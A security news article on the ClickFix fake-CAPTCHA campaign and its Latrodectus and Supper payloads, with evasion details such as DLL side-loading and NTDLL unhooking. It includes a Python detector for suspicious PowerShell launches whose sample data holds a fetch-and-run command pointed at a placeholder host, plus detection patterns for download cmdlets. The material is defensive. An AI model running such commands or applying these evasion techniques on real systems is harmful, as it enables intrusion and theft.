Enterprise networks around the world are under threat from a sophisticated cyberattack campaign that uses "ClickFix" social engineering delivered through a phony CAPTCHA prompt. These widespread campaigns, which pose as fixing a fictitious technical issue, deceive users into running malicious code themselves.

This scheme was recently used against a sizable Polish organization, illustrating how a single user's mistake can jeopardize an entire corporate infrastructure. The attack vector is notably deceptive. When users visit compromised websites, they are presented with a phony CAPTCHA or error-verification prompt that frequently imitates the user interface of Microsoft Word or Google Chrome. The prompt tells the victim to copy a particular PowerShell command and run it manually through the Windows Run dialog (Win+R) in order to "fix" the problem.

By relying on the user to run the code, the attackers bypass automated download filters and standard browser security measures.

[Figure: False CAPTCHA prompt instruction (Source: Cert.pl)]

The infection chain starts when the pasted command runs and downloads a dropper. During their investigation, Cert.pl analysts discovered suspicious traffic coming from the compromised host, which led them to identify the malware.

According to their analysis, the first PowerShell command establishes a network foothold by retrieving a malicious payload from a remote domain. Although the initial vector depends on user interaction, the researchers stressed that the automated stages that follow are quick and hard to stop without strong behavioral monitoring. The consequences are serious: the infection frequently ends in compromise of the entire organization.
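The "odd PowerShell activity" the researchers recommend watching for has a recognizable shape in process-creation telemetry: a shell launched from the Run dialog (so its parent is explorer.exe), with a hidden window, a download cmdlet and an Invoke-Expression in the command line. The following detector is an added example written for this article, not tooling from Cert.pl or from the campaign report; the event records are constructed samples shaped like Sysmon Event ID 1 fields, the URL is a placeholder, and the indicator weights and threshold are assumptions to tune against your own baseline.

```python
import re

# Constructed sample process-creation events (field names loosely follow
# Sysmon Event ID 1). Event 0 mimics a ClickFix-style launch; the others are
# benign. The domain is a deliberate placeholder, not an IoC from the report.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iex (iwr http://placeholder.invalid/x.ps1 -UseBasicParsing)"'},
    {"parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -File C:\Scripts\inventory.ps1"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": '"WINWORD.EXE" report.docx'},
]

# Interpreters a user can launch by typing into the Run dialog.
INTERACTIVE_SHELLS = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe")

# Command-line indicators and their weights (assumed values; tune per estate).
INDICATORS = {
    "hidden_window": (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 1),
    "download_cmdlet": (re.compile(
        r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile)\b", re.I), 2),
    "invoke_expression": (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 2),
    "remote_url": (re.compile(r"https?://", re.I), 1),
    "encoded_command": (re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), 2),
}


def analyze(event):
    """Score one process-creation event and list the indicators that fired."""
    reasons, score = [], 0
    parent = event["parent"].lower().rsplit("\\", 1)[-1]
    image = event["image"].lower().rsplit("\\", 1)[-1]
    # A shell whose parent is explorer.exe is consistent with a Win+R launch.
    if parent == "explorer.exe" and image in INTERACTIVE_SHELLS:
        reasons.append("interactive_shell_parent")
        score += 2
    for name, (pattern, weight) in INDICATORS.items():
        if pattern.search(event["cmdline"]):
            reasons.append(name)
            score += weight
    return {"score": score, "reasons": reasons}


def flag_events(events, threshold=4):
    """Return the events whose score reaches the (assumed) alert threshold."""
    hits = []
    for index, event in enumerate(events):
        result = analyze(event)
        if result["score"] >= threshold:
            hits.append({"index": index, **result})
    return hits


if __name__ == "__main__":
    for hit in flag_events(SAMPLE_EVENTS):
        print(f"event {hit['index']}: score {hit['score']} -> {', '.join(hit['reasons'])}")
```

The parent-process check is what separates a user pasting into Win+R from a scheduled task or management agent running the same cmdlets; on its own a download cmdlet is too common to alert on. When triaging a hit, the Run dialog's own history (the RunMRU values under the user's HKCU Explorer key) corroborates that the command was typed by the user rather than spawned by another program.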

The Latrodectus and Supper malware families are examples of the secondary payloads the attackers use to expand their initial access. These tools facilitate data exfiltration, lateral movement, and potentially ransomware deployment. By using the compromised machine to proxy traffic, threat actors can covertly map the internal network and identify vital assets for encryption or theft.

Evasion Strategies and Infection Mechanisms

The malware uses sophisticated evasion techniques, primarily DLL side-loading, to conceal its presence. In the incident under analysis, the attackers placed a malicious wtsapi32.dll file in the %APPDATA%\Intel directory alongside a legitimate igfxSDK.exe executable. The malicious library is loaded automatically when the legitimate application starts, allowing the code to run inside a trusted process.

This technique hides the malicious activity from many entry-level endpoint detection products. The identified Latrodectus variant also employs significant anti-analysis mechanisms. It blinds security tools to its actions by performing NTDLL unhooking, which removes the monitoring hooks placed by antivirus software.

Additionally, the malware checks for sandbox environments and will not run if it is launched by a common system tool such as rundll32.exe. Recommendations include blocking the execution of unverified scripts, monitoring for unusual PowerShell activity, warning staff about the risks of "fixing" browser errors via the Run dialog, and blocking the known Command and Control (C2) IP addresses linked to Supper and Latrodectus at the network perimeter.